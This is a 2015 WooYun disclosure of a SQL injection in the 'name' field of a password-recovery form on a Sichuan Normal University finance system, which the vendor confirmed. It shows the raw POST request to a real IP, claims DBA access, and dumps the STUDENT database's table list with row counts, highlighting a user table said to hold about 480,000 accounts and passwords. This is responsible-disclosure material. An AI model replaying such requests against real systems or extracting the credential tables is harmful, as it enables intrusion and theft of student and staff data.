当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0147516

漏洞标题:四川师范大学某处注入导致全库信息泄露

相关厂商:sicnu.edu.cn

漏洞作者: 云袭2001

提交时间:2015-10-19 11:32

修复时间:2015-12-05 14:44

公开时间:2015-12-05 14:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-19: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-31: 细节向核心白帽子及相关领域专家公开
2015-11-10: 细节向普通白帽子公开
2015-11-20: 细节向实习白帽子公开
2015-12-05: 细节向公众公开

简要描述:

rt

详细说明:

好吧 这次是计财处
一个注入点 导致全库信息泄露 计财处的数据库。。。咳咳。。东西确实多

漏洞证明:

POST的注入

POST /pages/User/findPass.do HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, */*
Referer: http://202.115.200.140:8082/pages/User/findPass.do
Accept-Language: zh-CN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 202.115.200.140:8082
Content-Length: 26
Pragma: no-cache
Cookie: JSESSIONID=C251CAB5EB301A27961B08521B281697
id=&step=1&name=2014110306


name 存在注入

1.png


DBA权限:

2.png


21库:

3.png


看看其中的一个
STUDENT 库:141张表

Database: STUDENT
[141 tables]
+------------------------+---------+
| Table                  | Entries |
+------------------------+---------+
| ZT_CJ_INFO_CHANGE      | 11105462|
| S_UPDATELOG            | 4365071 |
| SF_QFDB                | 1826115 |
| SF_YSK                 | 1826115 |
| SF_SFDMX               | 1618157 |
| SF_ZZ                  | 713811  |
| SF_SFDB                | 543828  |
| ZWXMJE                 | 509639  |
| USER_ROLE              | 486181  |
| S_USER                 | 486065  | 这里是账号和密码 48w条
| JZJ_FFSJ               | 402865  |
| ZWPZB                  | 274624  |
| SF_XSQF                | 252711  |
| PXSJZ                  | 244328  |
| JZJ_ZCXX               | 209501  |
| PXSDM                  | 208953  |
| DG_JCKJS               | 110653  |
| ZWNEW_ZWXMZD           | 90834   |
| SF_SFDMX_BAK           | 79660   |
| ZWXMZD                 | 62732   |
| ONLINE_USER            | 61196   |
| JZJ_ZCXX_EDIT          | 57781   |
| ZT_CJ_INFO             | 52200   |
| SF_TFDMX               | 48180   |
| SF_TFDB                | 42495   |
| TB_JWXT                | 35472   |
| TB_CJXT                | 35421   |
| TB_YJSXT               | 35421   |
| CJ_FP_FY_YFP           | 30172   |
| S_USER_INFO            | 26738   |
| JZJ_ZCXX_UPDATE        | 26505   |
| CJ_FP_DK               | 24991   |
| TEMP_XJXH              | 9670    |
| JZJ_CHECK_HIS          | 7726    |
| DG_JCK                 | 7701    |
| ZC_RESULT_BAK          | 7341    |
| PBJDM                  | 5983    |
| ZWKMZD                 | 5490    |
| ZC_RESULT_BAK_20131001 | 4978    |
| PZGDM                  | 4530    |
| SF_JMDMX               | 3665    |
| SF_JMDB                | 3611    |
| SUGGEST                | 2767    |
| GUEST                  | 2266    |
| PZGQX                  | 1364    |
| CW_JZJ_BAK             | 1204    |
| PZYDM_NEW              | 1093    |
| ZC_RESULT              | 1043    |
| TB_YXXT                | 958     |
| CJ_ZY_SFXM             | 942     |
| ZWBMZD                 | 832     |
| ROLE_RESOURCE          | 618     |
| ZWPZBH                 | 582     |
| ZWNEW_ZWKMZD           | 578     |
| CJ_FPBL                | 551     |
| JZJ_BASE               | 541     |
| ZC_RESULT20131105      | 487     |
| ZC_RESULT_2013004      | 487     |
| ZT_CJ_ZY_CHANGE        | 415     |
| CJ_FP_MX               | 331     |
| NEWSINFO               | 260     |
| S_RESOURCE             | 196     |
| ZWNEW_ZWXMLX           | 194     |
| CJ_YSKDM               | 175     |
| MYTEMP                 | 157     |
| ZWNEW_ZWBMZD           | 110     |
| PBMDM                  | 101     |
| ZGBM                   | 76      |
| PSFXM                  | 68      |
| CW_ZXDK_GJ_BAK         | 60      |
| ZWNEW_ZWXMLB           | 41      |
| CJ_BXXS                | 36      |
| JZJ_FFSJ_BAK           | 34      |
| PSFQJ                  | 33      |
| CJ_BJDM                | 31      |
| CW_FZZ                 | 24      |
| S_ROLE                 | 24      |
| PXSXZ                  | 21      |
| CJ_FZBMDM              | 18      |
| DBCONFIG               | 16      |
| NEWSTYPE               | 16      |
| PXSLY                  | 14      |
| DM_BASE_STATUS         | 13      |
| JZJ_XMLX               | 11      |
| BMLINK                 | 10      |
| QRTZ_CRON_TRIGGERS     | 10      |
| QRTZ_JOB_DETAILS       | 10      |
| QRTZ_TRIGGERS          | 10      |
| TB_PZGDM               | 10      |
| SMS_OTHER_SEND         | 9       |
| PPYCC                  | 8       |
| PXSZT                  | 8       |
| CW_ZXDK_GJ             | 7       |
| DM_FFDXLX              | 7       |
| USER_TYPE              | 7       |
| JZJ_BASE_BAK           | 6       |
| WEBARGS                | 6       |
| CW_INIT                | 5       |
| DM_ZJXZ                | 5       |
| QRTZ_LOCKS             | 5       |
| ZC_ID                  | 5       |
| ZXDK_GJ_BAK            | 5       |
| CJ_JD_XS               | 4       |
| CJ_LX                  | 4       |
| DM_FFSJ_ISSH           | 4       |
| PYHDM                  | 4       |
| CJ_BXMS                | 3       |
| CW_ZXDK_SYD            | 3       |
| JZJ_FFFS               | 3       |
| P_MEMO                 | 3       |
| TB_JZJ_FFSJ            | 3       |
| ZXDK_GJ                | 3       |
| ZXDK_SYD               | 3       |
| SMS_OTHER_SEND_BAK     | 2       |
| ZC_FILE                | 2       |
| ZXDK_SYD_BAK           | 2       |
| CJ_FP_DM_SFND          | 1       |
| CJ_FPBL_MEMO           | 1       |
| SMS_CONFIG             | 1       |
+------------------------+---------+


库里面的其他信息我就不点明了

修复方案:

这次影响算严重吧

版权声明:转载请注明来源 云袭2001@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-10-21 14:42

厂商回复:

感谢支持!

最新状态:

暂无

漏洞评价:

评价